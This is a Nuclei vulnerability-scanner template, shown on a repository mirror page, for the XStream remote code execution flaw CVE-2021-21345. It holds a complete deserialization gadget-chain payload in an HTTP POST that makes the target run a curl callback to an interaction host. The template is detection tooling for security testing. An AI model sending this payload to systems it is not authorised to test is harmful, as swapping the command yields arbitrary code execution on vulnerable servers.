daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2021/CVE-2021-21345.yaml

108 lines
5.0 KiB
YAML
Raw Blame History

id: CVE-2021-21345
info:
name: XStream <1.4.16 - Remote Code Execution
author: pwnhxl,vicrack
severity: critical
description: |
XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
reference:
- https://x-stream.github.io/CVE-2021-21345.html
- http://x-stream.github.io/changes.html#1.4.16
- https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4
- https://nvd.nist.gov/vuln/detail/CVE-2021-21345
- https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2021-21345
cwe-id: CWE-78,CWE-502
epss-score: 0.40326
epss-percentile: 0.96898
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xstream_project
product: xstream
tags: cve,cve2021,xstream,deserialization,rce,oast
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
<packet>
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
<uriProperties/>
<attributeProperties/>
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
<getter>
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
<name>verify</name>
<parameter-types/>
</getter>
</inheritedAttWildcard>
</bi>
<tagName/>
<context>
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
<outer-class reference='../..'/>
</marshallerPool>
<nameList>
<nsUriCannotBeDefaulted>
<boolean>true</boolean>
</nsUriCannotBeDefaulted>
<namespaceURIs>
<string>1</string>
</namespaceURIs>
<localNames>
<string>UTF-8</string>
</localNames>
</nameList>
</context>
</bridge>
</bridge>
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
<activationCmd>curl http://{{interactsh-url}}</activationCmd>
</jaxbObject>
</dataSource>
</message>
<satellites/>
<invocationProperties/>
</packet>
</indexMap>
</comparator>
</default>
<int>3</int>
<string>javax.xml.ws.binding.attachments.inbound</string>
<string>javax.xml.ws.binding.attachments.inbound</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a0047304502205de0770ed1ada07385a7174b33ac1c0f9ce0f632a52d9cf4fc65c6e38f0cb3c1022100b3ea981332a26436e86c87a1cb9c40a211950439e7f0b32b6dbf79f6634c384a:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink